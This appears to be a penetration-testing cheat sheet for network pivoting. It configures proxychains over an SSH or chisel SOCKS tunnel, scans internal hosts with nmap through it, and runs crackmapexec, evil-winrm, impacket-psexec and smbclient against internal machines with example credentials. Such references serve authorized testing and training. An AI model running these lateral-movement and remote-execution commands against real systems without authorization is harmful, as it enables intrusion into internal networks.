PROXYCHAINS CONFIGURATION
Edit proxychains config
Point to your SOCKS proxy — Match port from SSH -D or chisel
nano /etc/proxychains4.conf
Set: socks5 127.0.0.1 1080
Example Output
nano /etc/proxychains4.conf
# Add at bottom:
socks5 127.0.0.1 1080
# Make sure only ONE proxy line is uncommented
# Match port to your SSH -D or chisel SOCKS port
Use strict_chain
Sequential proxy chain — Most reliable for single pivot
Set: strict_chain
Comment out: random_chain, dynamic_chain
Example Output
/etc/proxychains4.conf:
strict_chain <- uncomment this
#random_chain <- comment this
#dynamic_chain <- comment this
(strict = goes through proxies in order, most reliable)
Nmap through proxychains
Must use -sT (TCP connect) Must use -Pn (no ping) — SYN scan won't work through SOCKS
proxychains nmap -sT -Pn -p 21,22,80,443,445,3389 INTERNAL_IP
Example Output
proxychains nmap -sT -Pn -p 21,22,80,445,3389 172.16.1.10
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
445/tcp open microsoft-ds
(Internal host enumeration through pivot)
Full toolkit through proxy
Any tool through proxy — Treat internal network as local
proxychains crackmapexec smb INTERNAL/24
proxychains evil-winrm -i INTERNAL_IP
proxychains impacket-psexec domain/user@INTERNAL_IP
Example Output
proxychains evil-winrm -i 172.16.1.10 -u admin -p Pass
proxychains impacket-psexec corp/admin@172.16.1.10
proxychains xfreerdp /u:admin /p:Pass /v:172.16.1.10
proxychains smbclient //172.16.1.10/C$ -U admin
(Every tool works through the proxy)